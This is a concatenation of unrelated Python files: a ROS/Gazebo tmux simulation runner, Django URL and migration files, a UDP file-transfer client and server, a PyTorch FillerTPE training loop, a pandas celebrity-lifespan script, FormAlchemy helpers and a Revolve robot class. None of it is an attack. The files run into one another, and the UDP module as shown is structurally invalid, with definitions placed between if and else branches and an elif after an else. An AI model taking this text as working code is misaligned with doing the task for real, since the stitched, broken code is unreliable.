    """Run *command* in a fresh tmux session, block until the simulation
    publishes 'data: True' on /end_of_sim, then kill everything.

    NOTE(review): relies on the module-level ``kill_all`` string defined in
    the __main__ block below -- confirm this function is only called from
    this script.
    """
    session_name="untitled"
    # Kill any stale session with the same name, then start a detached one.
    os.system("tmux kill-session -t" + session_name)
    os.system("tmux new -d -s "+str(session_name)+" -x 300 -y 300")
    commands=[command]
    for i in range(len(commands)):
        print('splitting ',i)
        os.system('tmux split-window ; tmux select-layout tiled')
    # Type each command into its own pane and press enter (C-m).
    for i in range(len(commands)):
        os.system('tmux send-keys -t '+str(session_name)+':0.'+str(i) +' "'+ commands[i]+'" '+' C-m')
    print("Commands sent")
    #waitUntilRoscoreIsRunning();
    # os.system("rostopic echo /rosout |grep 'End of simulation' -m 1") #-m 1 will make it return as soon as it finds the first match.
    output_string=""
    # Poll /end_of_sim every 3 s until it reports True.
    while (output_string.find('data: True')==-1):
        try: #['rostopic', 'echo', '/rosout', '|grep','simulation']
            output_string =str(subprocess.check_output("rostopic echo /end_of_sim -n 1", shell=True)) #, '|grep', 'Results' , '-n', '1'
        except:
            print("An Error occurred")
        time.sleep(3.0)
    print("Sim has finished")
    print("Killing the rest")
    os.system(kill_all)
def writeToFile(sentence):
    """Append *sentence* to ./results.txt.

    Uses a context manager so the handle is closed even if the write raises.
    """
    with open('./results.txt', 'a') as file_object:
        file_object.write(sentence)
if __name__ == '__main__':
    # Shell one-liner that tears down every ROS/Gazebo/planner process and
    # the tmux server.
    kill_all="tmux kill-server & killall -9 gazebo & killall -9 gzserver & pkill -f swarm_traj_planner & killall -9 multi_robot_node & killall -9 gzclient & killall -9 roscore & killall -9 rosmaster & pkill faster_node & pkill -f dynamic_obstacles & pkill -f rosout & pkill -f behavior_selector_node & pkill -f rviz & pkill -f rqt_gui & pkill -f perfect_tracker & pkill -f faster_commands"
    #make sure ROS (and related stuff) is not running
    os.system(kill_all)
    # Sweep over max velocities and both planner modes, running one full
    # simulation per (decentralized, u) combination.
    u_all=[2.0,3.0,4.0,5.0];
    decentralized=["false","true"]
    for i in range(len(decentralized)):
        for j in range(len(u_all)):
            command="roslaunch mpl_test_node test_multi_robot.launch rviz:=false u:="+str(u_all[j]) +" decentralized:="+str(decentralized[i]); #+" runsim:=false log:=false "; #>> $(rospack find swarm_planner)/scripts/results.txt
            launchCommandAndWaitUntilFinish(command);
|
"""URLs for bcauth."""
from django.conf.urls import patterns, url
# Account URLs for the bcauth app, using the string-based view notation.
# NOTE(review): django.conf.urls.patterns() with string view names is the
# pre-1.8 style and was removed in Django 1.10 -- confirm the pinned Django
# version before upgrading.
bcauth_urlpatterns = patterns(
    'bcauth.views',
    url(r'^accounts/$', 'account', name='account_base'),
    url(r'^accounts/profile/$', 'profile', name='account_profile'),
)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2019-04-08 12:37
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Drops the unused ``created_at`` column from the ``appleuser`` table."""

    dependencies = [
        ('apple', '0005_auto_20190408_1229'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='appleuser',
            name='created_at',
        ),
    ]
|
import socket
import struct
import binascii
import random
# Ask which end of the transfer this process is, and whether per-group
# progress reports should be printed.
while True:
    role = str(input("server/client? [s/c]: "))
    if role == 'c' or role == 's':
        break
while True:
    reports = input("reports? [y/n]: ")
    if reports == 'y' or reports == 'n':
        break
if role == 'c':
    # Client: open a UDP socket and try the handshake -- send the connect
    # answer, then wait for the server's one-byte accept flag.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    conn = input("connect? [y/n]: ")
    address = input("address: ")
    port = input("port: ")
    try:
        serverAddressPort = (address, int(port))
        s.sendto(conn.encode("utf-8"), serverAddressPort)
        serverAccept = s.recvfrom(1500)
        accept = int.from_bytes(serverAccept[0], "little")
    except:
        # Any failure (bad port, timeout, refused) counts as "not accepted".
        accept = 0
def make_first_header(num_of_packets, fragment_size, checksum):
    """Pack the handshake header: packet count, fragment size and the CRC
    of the initial payload ('iiL' layout)."""
    return struct.pack('iiL', num_of_packets, fragment_size, checksum)
def make_header(packet_num, check_sum):
    """Pack a per-fragment header: sequence number + payload CRC ('iL')."""
    return struct.pack('iL', packet_num, check_sum)
def get_num_of_packets(msg):
    """Return how many ``buffer_size``-character fragments *msg* splits into.

    Reads the module-level ``buffer_size`` set from user input.
    """
    # Ceiling division replaces the original repeated-slicing loop, which
    # copied the remaining string on every iteration (O(n^2) overall).
    n = (len(msg) + buffer_size - 1) // buffer_size
    print(f"num of packets ==== {n}")
    return n
def get_num_of_packets_file(file_path):
    """Return how many ``buffer_size``-byte fragments the file splits into."""
    n = 0
    # with-statement fixes the original's leaked file handle.
    with open(file_path, "rb") as f:
        chunk = f.read(buffer_size)
        while chunk:
            n += 1
            chunk = f.read(buffer_size)
    print(f"num of packets ==== {n}")
    return n
# Builds the packet list when sending a file.
def make_file_list(file_path):
    """Read *file_path* in ``buffer_size`` chunks and return the list of
    packets, each a (sequence number, CRC) header plus the raw chunk."""
    packets = []
    seq = 0
    with open(file_path, "rb") as f:
        chunk = f.read(buffer_size)
        while chunk:
            seq += 1
            crc = binascii.crc_hqx(chunk, 0)
            packets.append(make_header(seq, crc) + chunk)
            chunk = f.read(buffer_size)
    return packets
# Builds the packet list when sending a text message.
def make_msg_list(client_msg):
    """Split *client_msg* into ``buffer_size``-character pieces and return
    the list of packets, each a (sequence number, CRC) header plus the
    UTF-8 encoded piece."""
    packets = []
    seq = 0
    remaining = client_msg
    while remaining:
        seq += 1
        payload = remaining[:buffer_size].encode("utf-8")
        remaining = remaining[buffer_size:]
        crc = binascii.crc_hqx(payload, 0)
        packets.append(make_header(seq, crc) + payload)
    return packets
def send_msg(msg_from_client):
    """Send a text message in groups of 10 packets over the UDP socket ``s``.

    Protocol: first a handshake packet ('iiL' header + b"msg") is retried
    until the server answers "ok"; then groups of up to 10 data packets are
    sent, and after each group one feedback datagram is awaited:
    "fail" (+ index) -> resend from the failed packet, "0" -> resend the
    whole group, "ok" -> continue. The final server reply carries no header,
    which makes struct.unpack fail and terminates the loop.
    """
    num_of_packets = get_num_of_packets(msg_from_client)
    init_msg = "msg".encode("utf-8")
    type_checksum = binascii.crc_hqx(init_msg, 0)
    first_header = make_first_header(num_of_packets, buffer_size, type_checksum)
    while True:
        s.sendto(first_header + init_msg, serverAddressPort)
        confirm = s.recvfrom(1500)[0].decode("utf-8")
        if confirm == "ok":
            print("first packet ok!")
            break
        else:
            s.sendto(first_header + init_msg, serverAddressPort)
    packet_list = make_msg_list(msg_from_client)
    x = 0
    y = 10
    # counter of 10-packet groups
    n = 1
    while True:
        k = 1
        for i in range(x, y):
            if i >= num_of_packets:
                k = 0
                break
            s.sendto(packet_list[i], serverAddressPort)
        data = s.recvfrom(1500)[0]
        feedback = data[4:]
        feedback = feedback.decode("utf-8")
        header = data[:4]
        try:
            (failed_pckt,) = struct.unpack("i", header)
        except:
            # final "ok" has no 4-byte header -> transfer complete
            break
        # a corrupted packet arrived: resend starting from its index
        if feedback == "fail":
            print(f"packet no. {failed_pckt} failed!")
            for i in range(failed_pckt, y):
                s.sendto(packet_list[i], serverAddressPort)
        elif feedback == "ok" and reports == 'y':
            print(f"{n}. packets received ok!")
        # some packet never arrived: resend the whole group of 10
        elif feedback == '0':
            print("some packets did not come!")
            for i in range(x, y):
                if i >= num_of_packets:
                    k = 0
                    break
                s.sendto(packet_list[i], serverAddressPort)
        # all packets have been sent -> done
        if k == 0:
            break
        x += 10
        y += 10
        n += 1
    return 1
def send_file():
    """Send a file in groups of 10 packets over the UDP socket ``s``.

    Same group/feedback protocol as send_msg, except the handshake payload
    is the file extension, and when ``packet_fail`` is set one randomly
    chosen packet is deliberately truncated to its 8-byte header so the
    server's CRC check fails.
    """
    file_path = input("file path: ")
    # extract the file type (extension)
    # NOTE(review): split('.') raises for paths with more or fewer than one
    # dot (e.g. "./dir/archive.tar.gz"); rsplit('.', 1) would be safer.
    path, file_type = file_path.split('.')
    file_type = file_type.encode("utf-8")
    print(f"file type == {file_type}")
    num_of_packets = get_num_of_packets_file(file_path)
    type_checksum = binascii.crc_hqx(file_type, 0)
    first_header = make_first_header(num_of_packets, buffer_size, type_checksum)
    while True:
        s.sendto(first_header + file_type, serverAddressPort)
        confirm = s.recvfrom(1500)[0].decode("utf-8")
        if confirm == "ok":
            print("first packet ok!")
            break
        else:
            s.sendto(first_header + file_type, serverAddressPort)
    packet_list = make_file_list(file_path)
    # if the user asked for a corrupted packet, pick a random packet index
    if packet_fail == 1:
        fail = random.randint(0, num_of_packets)
    else:
        fail = 0
    x = 0
    y = 10
    # counter of 10-packet groups
    n = 1
    while True:
        k = 1
        for i in range(x, y):
            if i >= num_of_packets:
                k = 0
                break
            # to send the corrupted packet, transmit only its header
            if i == fail and packet_fail == 1:
                print("sending bad packet")
                s.sendto(packet_list[i][:8], serverAddressPort)
            else:
                s.sendto(packet_list[i], serverAddressPort)
        data = s.recvfrom(1500)[0]
        feedback = data[4:]
        feedback = feedback.decode("utf-8")
        header = data[:4]
        try:
            (failed_pckt,) = struct.unpack("i", header)
        except:
            # final "ok" has no 4-byte header -> transfer complete
            break
        # a packet was corrupted: resend starting from its index so that,
        # together with the ones before it, the group has 10 again
        if feedback == "fail":
            print(f"packet no. {failed_pckt} failed!")
            for i in range(failed_pckt, y):
                if i >= num_of_packets:
                    k = 0
                    break
                s.sendto(packet_list[i], serverAddressPort)
        elif feedback == "ok" and reports == 'y':
            print(f"{n}. packets received ok!")
        # some packet never arrived: resend the whole group of 10
        elif feedback == '0':
            print("some packets did not come!")
            for i in range(x, y):
                if i >= num_of_packets:
                    k = 0
                    break
                s.sendto(packet_list[i], serverAddressPort)
        if k == 0:
            break
        x += 10
        y += 10
        n += 1
    return 1
#server sa nastavil na pocuvanie a klient moze posielat
# The server is set up and listening, so the client may start sending.
if accept == 1:
    print("connected...")
    print("send msg = m")
    print("send file = f")
    print("disconnect = d")
    while True:
        while True:
            buffer_size = int(input("size of fragment: "))
            # A valid fragment size must be below 1460 bytes:
            # the UDP header takes 8 bytes, the IP header 20 and ours 12,
            # i.e. 1500 - 40 = 1460.
            if buffer_size >= 1460:
                print("incorrect buffer size!")
            else:
                break
        # should a corrupted packet be sent on purpose?
        packet_fail = int(input("failed packet? [1/0]: "))
        user_choice = input("your choice: ")
        s.sendto(user_choice.encode("utf-8"), serverAddressPort)
        if user_choice == 'm':
            msgFromClient = input("your msg: ")
            if send_msg(msgFromClient):
                print("message sent!")
        elif user_choice == 'f':
            if send_file():
                print("file sent!")
        elif user_choice == 'd':
            print("disconnected")
            break
else:
    print("could not connect!")
elif role == 's':
    # Server: bind a UDP socket on the requested port. The 1500-byte receive
    # size covers the largest client fragment plus headers.
    port = int(input("port: "))
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind(("", port))
    buffer_size = 1500
def make_feedback_header(wrong_packet):
    """Pack the index of the bad packet (0 = none) into a 4-byte header."""
    return struct.pack("i", int(wrong_packet))
def receive_msg():
    """Receive a text message over the UDP socket ``s``.

    First the handshake packet is validated by CRC and acknowledged; then
    fragments are collected into ``frag_list`` by sequence number. After
    every 10 packets a feedback datagram is sent: "ok", "fail" (+ index of
    the first bad packet), or "0" on a receive timeout. The final fragment
    is acknowledged with a bare "ok".
    """
    while True:
        init_data = s.recvfrom(buffer_size)
        packet = init_data[0]
        type_header = packet[:12]
        init_msg = packet[12:]
        (num_of_packets, packet_size, checksum) = struct.unpack("iiL", type_header)
        check = binascii.crc_hqx(init_msg, 0)
        if check == checksum:
            print("first packet ok!")
            s.sendto("ok".encode("utf-8"), address)
            break
        else:
            continue
    msgFromClient = ''
    # pre-fill an empty slot per fragment
    frag_list = []
    for i in range(0, num_of_packets):
        frag_list.append("")
    i = 1
    fail = 0
    corr = 0
    time = 3
    failed_pckt = 1
    while True:
        # set a timeout in case some packet never arrives
        s.settimeout(time)
        try:
            data = s.recvfrom(buffer_size)
            packet = data[0]
            header = packet[:8]
            (packetNum, checkSum) = struct.unpack("iL", header)
            msg = packet[8:]
            check = binascii.crc_hqx(msg, 0)
            msg = msg.decode("utf-8")
            # if the checksums match the packet is ok -> store it
            if check == checkSum:
                frag_list[packetNum - 1] = msg
                if fail == 0:
                    corr += 1
            else:
                print("fail!")
                if fail == 0:
                    fail = packetNum
                    if packetNum == 1 and failed_pckt == 1:
                        fail = 1
            # all 10 packets of the group arrived intact
            if i % 10 == 0 and corr == 10:
                header = make_feedback_header(fail)
                feedback = header + "ok".encode("utf-8")
                s.sendto(feedback, address)
                if reports == 'y':
                    print("packet ok!")
                fail = 0
                corr = 0
            # 10 packets arrived but at least one was corrupted
            elif i % 10 == 0 and fail != 0:
                print(f"packet no. {fail} failed!")
                header = make_feedback_header(fail)
                feedback = header + "fail".encode("utf-8")
                s.sendto(feedback, address)
                i = fail
                failed_pckt = 0
                fail = 0
            # everything arrived
            if packetNum == num_of_packets:
                s.sendto("ok".encode("utf-8"), address)
                break
            i += 1
        except:
            # the group did not arrive within three seconds: request it again
            print("some packets did not come")
            header = make_feedback_header(0)
            feedback = header + "0".encode("utf-8")
            s.sendto(feedback, address)
            i -= 9
            corr = 0
            time = 3
    print("message received!")
    for x in frag_list:
        msgFromClient += x
    print(msgFromClient)
def receiveFile():
    """Receive a file over the UDP socket ``s`` and write it to ./file.<ext>.

    Same group/feedback protocol as receive_msg; the handshake payload is
    the file extension, and the collected fragments are written to disk
    once the transfer completes.
    """
    while True:
        init_data = s.recvfrom(buffer_size)
        packet = init_data[0]
        type_header = packet[:12]
        file_type = packet[12:]
        file_name = "file"
        file_path = file_name + '.' + file_type.decode("utf-8")
        f = open(file_path, 'wb')
        (num_of_packets, packet_size, checksum) = struct.unpack("iiL", type_header)
        check = binascii.crc_hqx(file_type, 0)
        if check == checksum:
            print("first packet ok!")
            s.sendto("ok".encode("utf-8"), address)
            break
        else:
            continue
    # pre-fill an empty slot per fragment
    frag_list = []
    for i in range(0, num_of_packets):
        frag_list.append("")
    i = 1
    fail = 0
    corr = 0
    time = 3
    while True:
        # set a timeout in case some packet never arrives
        s.settimeout(time)
        try:
            data = s.recvfrom(buffer_size)
            packet = data[0]
            header = packet[:8]
            (packetNum, checkSum) = struct.unpack("iL", header)
            file = packet[8:]
            if reports == 'y':
                print(f"{packetNum} / {num_of_packets} packet = {checkSum}")
            check = binascii.crc_hqx(file, 0)
            # if the checksums match the packet is ok -> store it
            if check == checkSum:
                frag_list[packetNum - 1] = file
                if fail == 0:
                    corr += 1
            else:
                if reports == 'y':
                    print("fail!!!")
                if fail == 0:
                    fail = packetNum
                    if packetNum == 1:
                        fail = 1
            # all 10 packets of the group arrived intact
            if i % 10 == 0 and corr == 10:
                header = make_feedback_header(fail)
                feedback = header + "ok".encode("utf-8")
                s.sendto(feedback, address)
                if reports == 'y':
                    print("packet ok!")
                fail = 0
                corr = 0
            # 10 packets arrived but at least one was corrupted
            elif i % 10 == 0 and fail != 0:
                print(f"packet no. {fail} failed!")
                header = make_feedback_header(fail)
                feedback = header + "fail".encode("utf-8")
                s.sendto(feedback, address)
                i = fail
                fail = 0
            if packetNum == num_of_packets:
                s.sendto("ok".encode("utf-8"), address)
                break
            i += 1
        except:
            # the group did not arrive within three seconds: request it again
            print("some packets did not come")
            header = make_feedback_header(0)
            feedback = header + "0".encode("utf-8")
            s.sendto(feedback, address)
            i -= 9
            corr = 0
            time = 3
    print("file received!")
    for x in frag_list:
        f.write(x)
    f.close()
def listen():
    """Dispatch loop: wait for the client's menu choice and route it to the
    message/file receivers; 40 s of silence counts as a disconnect."""
    print("listening...")
    while True:
        s.settimeout(40)
        try:
            clientChoice = s.recvfrom(buffer_size)
            choice = clientChoice[0].decode("utf-8")
            if choice == 'm':
                receive_msg()
            elif choice == 'f':
                receiveFile()
            elif choice == 'd':
                print("disconnected...")
                break
        except:
            # timeout (or any socket error) is treated as a disconnect
            print("disconnected...")
            break
# Handshake: wait up to 20 s for the client's connect request, acknowledge
# with a single accept byte, then start serving.
s.settimeout(20)
try:
    conn = s.recvfrom(buffer_size)
    c = conn[0]
    c = c.decode("utf-8")
    address = conn[1]
    print(c)
    print(address)
    if c == 'y':
        accept = 1
        s.sendto(bytes([accept]), address)
        listen()
except:
    print("no connection")
# Functions needed for training models
from __future__ import unicode_literals, print_function, division
from io import open
import unicodedata
import string
import re
import random
from random import shuffle
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch import optim
import torch.nn.functional as F
import numpy as np
import sys
import os
import time
import math
import pickle
from FillerTPE import FillerTPE
use_cuda = torch.cuda.is_available()
def train_TPE(Batch, TPE, TPE_optimizer, criterion):
    """Run one optimization step of a FillerTPE encoder on a single batch.

    :param Batch: [sequences, target vectors] pair
    :param TPE: the FillerTPE encoder to train
    :param TPE_optimizer: optimizer over TPE.parameters()
    :param criterion: reconstruction loss (MSE)
    :return: (total loss value, mse, one-hot reg, l2 reg, unique-filler reg)
    :raises TypeError: if TPE is not a FillerTPE
    """
    Sequence_list, Vectors_list = Batch[0], Batch[1]
    Vectors_list = torch.tensor(Vectors_list)
    TPE_optimizer.zero_grad()
    mse_loss, one_hot_loss, l2_norm_loss, unique_filler_loss = 0, 0, 0, 0
    if isinstance(TPE, FillerTPE):
        TPE_output, filler_predictions = TPE(Sequence_list)
        batch_one_hot_loss, batch_l2_loss, batch_unique_loss = \
            TPE.get_regularization_loss(filler_predictions)
        one_hot_loss += batch_one_hot_loss; l2_norm_loss += batch_l2_loss; unique_filler_loss += batch_unique_loss
    else:
        # Fail fast: the original only printed here and then crashed with a
        # NameError on the unbound TPE_output below.
        raise TypeError('Encoder should be a TPE, given ' + str(type(TPE)) + ' instead!!!')
    mse_loss += criterion(TPE_output, Vectors_list.unsqueeze(0))
    loss = mse_loss + one_hot_loss + l2_norm_loss + unique_filler_loss
    loss.backward()
    TPE_optimizer.step()
    return loss.data.item(), mse_loss, one_hot_loss, l2_norm_loss, unique_filler_loss
def bishuffle(bidata):
    """Shuffle paired sequence/vector tensors in unison.

    Returns new tensors [S_shuffled, V_shuffled] where both sides are
    permuted by the same random order, preserving row pairing.
    """
    seqs, vecs = bidata[0], bidata[1]
    order = list(range(len(seqs)))
    shuffle(order)
    shuffled_seqs = torch.zeros_like(seqs)
    shuffled_vecs = torch.zeros_like(vecs)
    for dst, src in enumerate(order):
        shuffled_seqs[dst] = seqs[src]
        shuffled_vecs[dst] = vecs[src]
    return [shuffled_seqs, shuffled_vecs]
def batchify(data, batch_size):
    """Split paired data [X, Y] into consecutive [X_chunk, Y_chunk] batches
    of at most *batch_size* items (last batch may be smaller)."""
    total = len(data[0])
    num_batches = math.ceil(total / batch_size)
    return [
        [data[0][b * batch_size:(b + 1) * batch_size],
         data[1][b * batch_size:(b + 1) * batch_size]]
        for b in range(num_batches)
    ]
def trainIters_TPE(Train_data, Test_data, TPE, n_epochs,
                   learning_rate=0.001, batch_size=5, patience=3, weight_file=None,
                   use_one_hot_temperature=True, burn_in=0):
    """Train a FillerTPE with an MSE + regularization objective.

    The regularization temperature ramps up linearly after *burn_in* epochs;
    the best model (by test loss) is saved under *weight_file* and training
    stops early after *patience* epochs without improvement.

    :param weight_file: path prefix where the model is stored
    :return: (list of filler-embedding snapshots per epoch, list of report lines)
    """
    TPE_optimizer = optim.Adam(TPE.parameters(), lr=learning_rate)
    criterion = nn.MSELoss()
    pre_loss = 1000000
    one_hot_temperature = 0.0
    if use_one_hot_temperature:
        one_hot_temperature = 1.0
    count_epochs_not_improved = 0
    best_loss = pre_loss
    report_text = []
    Embedding_trace = []
    reached_max_temp = False
    for epoch in range(n_epochs):
        # snapshot the filler embedding before this epoch's updates
        Embedding_trace.append(TPE.filler_assigner.filler_embedding.weight.clone().detach())
        print("starting training epoch: " + str(epoch) + '\n')
        if burn_in == epoch:
            print('Burn in is over, turning on regularization')
            if isinstance(TPE, FillerTPE):
                TPE.use_regularization(True)
            if burn_in == 0:
                # no burn-in: jump straight to full temperature
                print('Setting regularization temp to {}'.format(1))
                if isinstance(TPE, FillerTPE):
                    TPE.set_regularization_temp(1)
                reached_max_temp = True
        if epoch >= burn_in and not reached_max_temp:
            # linear ramp from 1/burn_in up to 1
            temp = float(epoch - burn_in + 1) / burn_in
            if temp <= 1:
                print('Setting regularization temp to {}'.format(temp))
                TPE.set_regularization_temp(temp)
            else:
                reached_max_temp = True
        epoch_loss = 0
        epoch_mse_loss = 0; epoch_one_hot_loss = 0; epoch_l2_loss = 0; epoch_unique_filler_loss = 0
        epoch_Train = bishuffle(Train_data)
        batch_Train = batchify(epoch_Train, batch_size)
        if isinstance(TPE, FillerTPE):
            TPE.train()
        for batch in batch_Train:
            loss, batch_mse_loss, batch_one_hot_loss, batch_l2_loss, batch_unique_filler_loss = train_TPE(batch, TPE, TPE_optimizer, criterion)
            epoch_mse_loss += batch_mse_loss; epoch_one_hot_loss += batch_one_hot_loss; epoch_l2_loss += batch_l2_loss; epoch_unique_filler_loss += batch_unique_filler_loss
        epoch_loss = epoch_mse_loss + epoch_one_hot_loss + epoch_l2_loss + epoch_unique_filler_loss
        # Fix: the original divided by len(batch_Train[0]) which is always 2
        # (a [sequences, vectors] pair), not the number of batches.
        Num_train_batch = len(batch_Train)
        epoch_loss /= Num_train_batch; epoch_mse_loss /= Num_train_batch; epoch_one_hot_loss /= Num_train_batch; epoch_l2_loss /= Num_train_batch; epoch_unique_filler_loss /= Num_train_batch
        # report training loss
        if epoch >= burn_in:
            train_report = 'Average Training Loss is ' + str(epoch_loss.item()) + ' ; ' + str(epoch_mse_loss.item()) + ' ; ' + str(epoch_one_hot_loss.item()) + ' ; ' + str(epoch_l2_loss.item()) + ' ; ' + str(epoch_unique_filler_loss.item()) + ' ; \n'
        else:
            train_report = 'Average Training Loss is ' + str(epoch_mse_loss.item()) + ' ; \n'
        print(train_report)
        report_text.append(train_report)
        if isinstance(TPE, FillerTPE):
            TPE.eval()
        test_loss, test_mse_loss, test_one_hot_loss, test_l2_loss, test_unique_loss = 0, 0, 0, 0, 0
        batch_Test = batchify(Test_data, batch_size)
        for batch in batch_Test:
            TPE_output, filler_predictions = TPE(batch[0])
            batch_one_hot_loss, batch_l2_loss, batch_unique_loss = \
                TPE.get_regularization_loss(filler_predictions)
            batch_mse_loss = criterion(TPE_output, batch[1].unsqueeze(0))
            # Fix: the original accumulated batch_unique_filler_loss, a stale
            # value left over from the *training* loop, instead of this
            # batch's batch_unique_loss.
            test_mse_loss += batch_mse_loss; test_one_hot_loss += batch_one_hot_loss; test_l2_loss += batch_l2_loss; test_unique_loss += batch_unique_loss
            test_loss += batch_mse_loss + batch_one_hot_loss + batch_l2_loss + batch_unique_loss
        if reached_max_temp or burn_in == epoch:
            if test_loss < best_loss:
                print('Saving model at epoch {}'.format(epoch))
                count_epochs_not_improved = 0
                best_loss = test_loss
                torch.save(TPE, weight_file + 'TPE.pth')
                torch.save(TPE.filler_assigner, weight_file + 'assigner.pth')
            else:
                count_epochs_not_improved += 1
                if count_epochs_not_improved == patience:
                    print('Finished training early')
                    break
        # Fix: same batch-count error as on the training side.
        Num_test_batch = len(batch_Test)
        test_loss /= Num_test_batch; test_mse_loss /= Num_test_batch; test_one_hot_loss /= Num_test_batch; test_l2_loss /= Num_test_batch; test_unique_loss /= Num_test_batch
        if epoch >= burn_in:
            test_report = 'Average Test Loss is ' + str(test_loss.item()) + ' ; ' + str(test_mse_loss.item()) + ' ; ' + str(test_one_hot_loss.item()) + ' ; ' + str(test_l2_loss.item()) + ' ; ' + str(test_unique_loss.item()) + ' ; \n\n'
        else:
            test_report = 'Average Test Loss is ' + str(test_mse_loss.item()) + ' ; \n'
        print(test_report)
        report_text.append(test_report)
    return Embedding_trace, report_text
def test_TPE(Test_data, TPE, weight_file=None):
    """Evaluate a FillerTPE on *Test_data* and return its MSE divided by the
    dataset size.

    NOTE(review): if TPE is not a FillerTPE this only prints a warning and
    implicitly returns None -- confirm callers handle that. ``weight_file``
    is accepted but unused.
    """
    if not isinstance(TPE, FillerTPE):
        print('Expected model of FillerTPE, Given ' + str(type(TPE)) + ' instead!!!')
    else:
        Test_Seq, Test_Vec = Test_data[0], Test_data[1]
        Test_Vec = torch.tensor(Test_Vec)
        TPE.eval()
        output, filler_prediction = TPE(Test_Seq)
        criterion = nn.MSELoss()
        mseloss = criterion(output, Test_Vec)
        # NOTE(review): MSELoss already averages over elements; dividing by
        # the number of examples again may double-normalize -- confirm.
        return mseloss / len(Test_data[0])
|
import numpy as np
import pandas as pd
import os
from io import StringIO
import matplotlib.pyplot as plt
from collections import Counter
# Move into the local data directory.
# NOTE(review): os.chdir is a process-wide side effect and the absolute path
# is machine-specific.
cwd = os.getcwd()
print(cwd)
path = "/Users/janmichaelaustria/Documents/Data Sets"
os.chdir(path)
cwd = os.getcwd()
print(cwd)
celebrities = pd.read_csv("celebrity_deaths_4.csv",header=0,encoding = 'unicode_escape')
# NOTE(review): .info without parentheses only references the method; .info()
# would actually print the summary.
celebrities.info
#view head of celebrities
celebrities.head(5)
celebrities.columns
# Keep just birth and death years as a 2-column array.
columns_to_grab = ['birth_year','death_year']
celebrities_df = celebrities[columns_to_grab]
birth_death_years = celebrities_df.values
min_year = min(birth_death_years[:,0])
max_year = max(birth_death_years[:,1])
# Expand each person into the list of calendar years they were alive
# (assumes the year columns are integers -- range() would fail on floats).
list_years = []
for i in range(birth_death_years.shape[0]):
    #get life span for the person
    life_span = birth_death_years[i,1] - birth_death_years[i,0]
    for j in range(life_span):
        #get the jth year
        j_year = birth_death_years[i,0] + j
        #add the year to list_years
        list_years.append(j_year)
array_list_years = np.array(list_years)
#get dictionary of counts from array
value_count = Counter(array_list_years)
max_value = max(value_count.values())
max_year_idx = []
# NOTE(review): max_year is taken while max_year_idx is still empty, so this
# is an empty selection; it would need recomputing after the loop below.
# Also, the enumerate indices refer to positions in value_count.values(),
# not to positions in array_list_years -- confirm intent.
max_year = array_list_years[max_year_idx]
for a,b in list(enumerate(value_count.values())):
    if b == max_value:
        to_index = a
        max_year_idx.append(to_index)
plt.hist(array_list_years)
plt.show()
#first create a sorting function to sort the list
def selection_sort(arr):
    """Sort *arr* in place with selection sort and return it.

    Repeatedly swaps the minimum of the unsorted tail into position.
    """
    for pos in range(len(arr)):
        smallest = pos + np.argmin(arr[pos:])
        arr[pos], arr[smallest] = arr[smallest], arr[pos]
    return arr
# NOTE(review): bare expression -- the length is computed and discarded
# (leftover from interactive exploration).
len(list_years)
#need to filter out list of years that are repeated
# NOTE(review): this membership test against a list is O(n^2); a set or
# dict.fromkeys would deduplicate in linear time.
filtered_list = []
for bah in list_years:
    if bah not in filtered_list:
        filtered_list.append(bah)
|
# -*- coding: utf-8 -*-
from app.utils import formatting
from formalchemy import FieldSet
from formalchemy.fields import Field
from formalchemy.tables import Grid
import datetime
import operator
def create_generic_date_field(name, attr_getter, dt_format, today_by_default=True):
    """ Instanciates a generic date field associated with the format passed as a parameter """
    def value(model):
        """ Returns the model date or today's date """
        default_date = datetime.date.today() if today_by_default else None
        # NOTE(review): 'and/or' idiom -- if attr_getter(model) is falsy
        # (e.g. None), this also falls back to default_date; confirm intended.
        dt = model and attr_getter(model) or default_date
        # returns None when dt is None (and today_by_default is False)
        return dt and formatting.format_date(dt, dt_format)
    return Field(name=name, value=value)
def create_date_field(name, model_date_attribute, dt_format, today_by_default=True):
    """ Instanciates a standard date field associated with the format passed as a parameter """
    date_getter = operator.attrgetter(model_date_attribute)
    return create_generic_date_field(name, date_getter, dt_format, today_by_default)
class CustomGrid(Grid):
    """ Used when simple FormAlchemy grids are not sufficient
    (i.e. when the synchronization process should be customized)
    A 'post_sync' method, responsible for non-standard synchronization & persistence,
    should be defined when inheriting of this class.
    """
    def __init__(self, cls, instances):
        super(CustomGrid, self).__init__(cls, instances)

    def sync_one(self, row):
        self._set_active(row)
        # Standard synchronization of the fields
        # (itervalues: this module targets Python 2)
        for field in self.render_fields.itervalues():
            field.sync()
        # Customized synchronization & persistence (defined by the child class)
        self.post_sync()
class CustomFieldSet(FieldSet):
    """ Used when simple FormAlchemy fieldsets are not sufficient
    (i.e. when the synchronization process should be customized)
    A 'post_sync' method, responsible for non-standard synchronization & persistence,
    should be defined when inheriting of this class.
    """
    def __init__(self, model):
        super(CustomFieldSet, self).__init__(model)

    def sync(self):
        # Standard synchronization of the fields
        # (itervalues: this module targets Python 2)
        for field in self.render_fields.itervalues():
            field.sync()
        # Customized synchronization & persistence (defined by the child class)
        self.post_sync()
# Generated by Django 2.2.2 on 2019-06-04 11:35
from django.db import migrations, models
class Migration(migrations.Migration):
    """Makes ``colID`` the primary key of ``collection`` (100-char CharField)."""

    dependencies = [
        ('DBCalls', '0002_auto_20190604_1054'),
    ]

    operations = [
        migrations.AlterField(
            model_name='collection',
            name='colID',
            field=models.CharField(max_length=100, primary_key=True, serialize=False),
        ),
    ]
|
import random
from sdfbuilder.math import Vector3
from revolve.util import Time
from revolve.angle import Robot as RvRobot
class Robot(RvRobot):
    """
    Class to manage a single robot
    """
    def __init__(self, conf, name, tree, robot, position, time, battery_level=0.0, parents=None):
        """
        :param conf:
        :param name:
        :param tree:
        :param robot: Protobuf robot
        :param position:
        :type position: Vector3
        :param time:
        :type time: Time
        :param parents:
        :type parents: tuple(Robot, Robot)
        :param battery_level: Battery charge for this robot
        :type battery_level: float
        :return:
        """
        speed_window = int(conf.evaluation_time * conf.pose_update_frequency)
        super(Robot, self).__init__(name=name, tree=tree, robot=robot, position=position, time=time,
                                    battery_level=battery_level, speed_window=speed_window,
                                    warmup_time=conf.warmup_time, parents=parents)
        # Mapping of mate name -> number of children produced with that mate
        self.mated_with = {}
        self.last_mate = None
